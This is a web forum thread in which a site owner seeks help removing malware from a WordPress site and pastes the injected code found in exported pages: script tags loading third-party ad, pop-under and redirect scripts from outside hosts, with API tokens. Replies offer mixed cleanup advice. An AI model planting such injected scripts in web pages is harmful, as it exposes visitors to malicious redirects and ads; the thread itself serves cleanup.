Anyone know how to clean a site with malware? My site funny-tshirts.com has it bad and I really can't afford $250 to clean it up. Thanks for any help.
Delete it and restore from backup Delete the system files and upload a clean version. Go through every file looking for code that is out of place
It was a old site that hasn't been hosted in almost a year. I just happened to have the files for it, so there isn't really anything I can do when it comes to restoring it. Going through files looking for code wouldn't be practical. I don't think I could "delete the system files and upload clean version". I was on the phone with my host "Host Gator" earlier when we were putting up my site and I think he did that, but it still has the malware.
Are you sure that you've not got a backup of the files that's known to be clean? btw: You should change your FTP password anyway, make sure that the new password is a strong one
No backup. My host cleaned a lot of it today. It might be solved, but not sure yet. Site is up, not great, but up. Have to fix a bunch of stuff on it though.
How long was the wait? A couple of days ago I tried to call regarding one of my sites and the wait was 92 minutes. I hope the whole virus thing is not going to further affect their customer service.
With Host Gator? I've been on the phone with them several times and the wait has only been a couple minutes each time.
So I had to pretty much Delete everything on the host and the database and start over. I installed Wordpress from scratch. Before I did that, I used the basic tools in Wordpress and exported posts, pages, media, etc... I kept all that. When I opened the fresh install of my site, I went ahead and imported those files to see the results. I at least got to keep the main content. Well it looks like the malware is still there and obviously was in the exported files of my exported pages. It looks like they are in the pages and not the posts and I found the code that is the problem, but I can't tell where it starts and where it stops. Here is the code: #pl-2 .panel-grid .panel-grid-cell-mobile-last { margin-bottom:0px } } </style><script type="text/javascript"> var adlinkfly_url = 'https://funny-tshirts.com/'; var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641'; var adlinkfly_advert = 2; var adlinkfly_exclude_domains = ['example.com', 'yoursite.com']; </script> <script src='//cutwin.com/js/full-page-script.js'></script> <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[ (function() { var configuration = { "token": "11f0dc1ed8453e409e04d86bea962f34", "exitScript": { "enabled": true }, "popUnder": { "enabled": true } }; Code (markup): Any idea? Most of this code is in there several times so I'm thinking if I can find where it starts and begins, I could delete it, save the code, and start all over again.
Unless you know the scripts referred to in lines 7 and 8 are clean I'd get rid of them pub2srv looks like it would be an ad publisher but redirects to hxxp://cobalten.com/apu.php?zoneid=683723 Code (markup): and downloads a file with empty OK Code (markup): go mobisla downloaded a notice.php with this empty OK Code (markup): but I suspect when called from a webserver both scripts do something very, very nasty.
Oh yeah, I know that code in 7&8 are definitely malware. I just don't know if I should delete anything before or after that. I'm not a coder, so I don't know how bad it would be or not be if I left incomplete code behind.
and these lines make me curious: var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641'; "token": "11f0dc1ed8453e409e04d86bea962f34",
Clean a site with "malware"? How about you just review the code and remove anything malicious that you didn't write. And if you don't care about the site take it down and move the fuck on.
If the work had value the domain wouldn't have been parked for a year, right? I've been there, have been paying for a domain for years, the site had been hacked so hosting account was locked and I needed to contact the host's admin and negotiate to have it unlocked. In the end, I decided that none of the content mattered so I deleted it from my reseller panel and added it back in.
Same. And also if you use shared environments expect unexpected guests to infringe. I've had scripts people added code to with ads and redirects. What did I do? 1. restore my site from current back ups. (I have learned to back up the back up and the back and to do this over and over and often). 2. move out of a shared environment to at least a VPS or cloud account. If your site is important then it's worth the extra money. If you didn't back up your site then go through the code. If you don't have the time then pay someone else. If you don't have the money or the time than you have just realized how unimportant this site is. So take it down and move on.
Hi Thomas Scheetz, I am developer of Wordpress & PHP & having more than 7+ year exp your site don't have any malware https://sitecheck.sucuri.net/results/funny-tshirts.com https://www.siteguarding.com/ you can even check on that
You can use tools that scan your site remotely to find malicious payloads and malware. Sucuri has a free WordPress plugin that you can find in the official WordPress repository.